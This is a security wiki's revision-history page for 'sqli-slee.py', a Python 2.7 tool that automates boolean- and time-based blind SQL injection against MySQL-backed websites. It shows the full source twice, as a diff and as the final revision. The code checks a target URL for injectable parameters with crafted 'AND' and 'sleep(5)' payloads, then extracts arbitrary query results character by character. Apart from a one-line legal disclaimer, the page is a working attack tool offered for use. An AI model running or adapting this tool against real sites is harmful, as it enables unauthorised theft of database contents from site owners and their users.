Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

From NetSec
Jump to: navigation, search
 
(9 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolean based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
   python bsqli.py -u [url] -i [injection]
+
   python sqli-slee.py -u [url] -i [injection]
 
==Example==
 
==Example==
   python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
+
   python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"
  
 
==Disclaimer==
 
==Disclaimer==
Line 12: Line 15:
 
=Source=
 
=Source=
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
#!/usr/bin/python
+
#!/usr/bin/python2.7
 
   
 
   
import sys,re,urllib,urllib2,string,time
+
import sys,re,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
   
 
   
 
def request(URL):
 
def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)
+
    req = urllib2.Request(URL, None, user_agent)
  
  try:
+
    try:
    request = urllib2.urlopen(req)
+
        request = urllib2.urlopen(req)
  
  except HTTPError, e:
+
    except HTTPError, e:
    print('[!] The server couldnt fulfill the request.')
+
        print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(e.code))
+
        print('[!] Error code: ' + str(e.code))
    sys.exit(1)
+
        sys.exit(1)
  
  except URLError, e:
+
    except URLError, e:
    print('[!] We failed to reach a server.')
+
        print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(e.reason))
+
        print('[!] Reason: ' + str(e.reason))
    sys.exit(1)
+
        sys.exit(1)
  
  return len(request.read())
+
    return len(request.read())
 
   
 
   
 
def value(URL):
 
def value(URL):
  target = 0
+
    target = 0
  end = 0
+
    end = 0
  next_maybe = 0
+
    next_maybe = 0
  floor = 0
+
    floor = 0
  ceiling = 255
+
    ceiling = 255
  maybe = int(ceiling)/2
+
    maybe = int(ceiling)/2
  
  while(end != 9):
+
    while(end != 9):
    if(is_what(URL, maybe, '>')):
+
        if(is_what(URL, maybe, '>')):
      floor = maybe
+
            floor = maybe
      next_maybe = int(maybe + ((ceiling - floor)/2))
+
            next_maybe = int(maybe + ((ceiling - floor)/2))
  
    elif(is_what(URL, maybe, '<')):
+
        elif(is_what(URL, maybe, '<')):
      ceiling = maybe
+
            ceiling = maybe
      next_maybe = int(maybe - ((ceiling - floor)/2))
+
            next_maybe = int(maybe - ((ceiling - floor)/2))
  
    elif(is_what(URL, maybe, '=')):
+
        elif(is_what(URL, maybe, '=')):
      return chr(maybe)
+
            return chr(maybe)
  
    maybe = next_maybe
+
        maybe = next_maybe
    end += 1
+
        end += 1
  
  return 'done'
+
    return 'done'
 
   
 
   
 
def is_what(URL, maybe, op):
 
def is_what(URL, maybe, op):
  if(sqli_type == 'boolean'):
+
    if(sqli_type == 'boolean'):
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
+
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
    if(TrueResponse == ValueResponse):
+
        if(TrueResponse == ValueResponse):
      return 1
+
            return 1
    else:
+
        else:
      return 0
+
            return 0
  elif(sqli_type == 'time'):
+
    elif(sqli_type == 'time'):
    start = time.time()
+
        start = time.time()
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
+
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
    elapsed_time = (time.time() - start)
+
        elapsed_time = (time.time() - start)
    if (elapsed_time > 2):
+
        if (elapsed_time > 2):
      return 1
+
            return 1
    else:
+
        else:
      return 0
+
            return 0
 
   
 
   
 
def vuln_check(URL):
 
def vuln_check(URL):
  print('[+] Checking site...')
+
    print('[+] Checking site...')
 
+
  global TrueResponse
+
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
+
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
+
  
  if(TrueResponse != FalseResponse):
+
    global TrueResponse
     print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
+
     TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
     return 'boolean'
+
     FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  else:
+
    start = time.time()
+
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
+
    elapsed_time = (time.time() - start)
+
  
     if(elapsed_time > 5):
+
     if(TrueResponse != FalseResponse):
      print('[+] Site seems to be vulnerable to time based blind SQL injection.')  
+
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
      return 'time'
+
        return 'boolean'
 
     else:
 
     else:
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
        start = time.time()
      sys.exit(1)
+
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
 +
        elapsed_time = (time.time() - start)
 +
 
 +
        if(elapsed_time > 5):
 +
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
            return 'time'
 +
        else:
 +
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
            sys.exit(1)
 
   
 
   
 
def main():
 
def main():
  print('''
+
    print('''
        Auto BSQLi tool for MySQL
+
                Auto BSQLi tool for MySQL
        ''')
+
                ''')
 
   
 
   
  usage = 'usage: %prog -u <target> -i <injection>'
+
    usage = 'usage: %prog -u <target> -i <injection>'
  parser = OptionParser(usage=usage)
+
    parser = OptionParser(usage=usage)
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
+
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
+
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
   
 
   
  (options, args) = parser.parse_args()
+
    (options, args) = parser.parse_args()
  if(options.URL and options.INJECTION):
+
    if(options.URL and options.INJECTION):
    URL = options.URL
+
        URL = options.URL
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
+
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
  else:
+
    else:
    print('[!] Missing url or injection parameter.')
+
        print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
+
        print('[!] Use --help.')
    sys.exit(1)
+
        sys.exit(1)
 
   
 
   
  global sqli_type
+
    global sqli_type
  sqli_type = vuln_check(URL)
+
    sqli_type = vuln_check(URL)
  position = 1
+
    position = 1
  dump = ''
+
    dump = ''
  print('[+] Dumping data...')
+
    print('[+] Dumping data...')
  
  while(1):
+
    while(1):
    if(sqli_type == 'boolean'):
+
        if(sqli_type == 'boolean'):
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
+
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
    elif(sqli_type == 'time'):
+
        elif(sqli_type == 'time'):
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
+
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
  
    if(letter == 'done'):
+
        if(letter == 'done'):
      break
+
            break
  
    dump = dump + letter
+
        dump = dump + letter
    position += 1
+
        position += 1
  
  if(dump):
+
    if(dump):
    print('[+] Data: ' + dump)
+
        print('[+] Data: ' + dump)
  else:
+
    else:
    print('[!] No data dumped. Check your injection.')
+
        print('[!] No data dumped. Check your injection.')
 
   
 
   
 
if __name__ == "__main__":
 
if __name__ == "__main__":
  main()
+
    main()
 
</source>}}
 
</source>}}

Latest revision as of 02:57, 21 November 2012

c3el4.png
This python script uses time and boolean based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        request = urllib2.urlopen(req)
 
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    return len(request.read())
 
def value(URL):
    target = 0
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()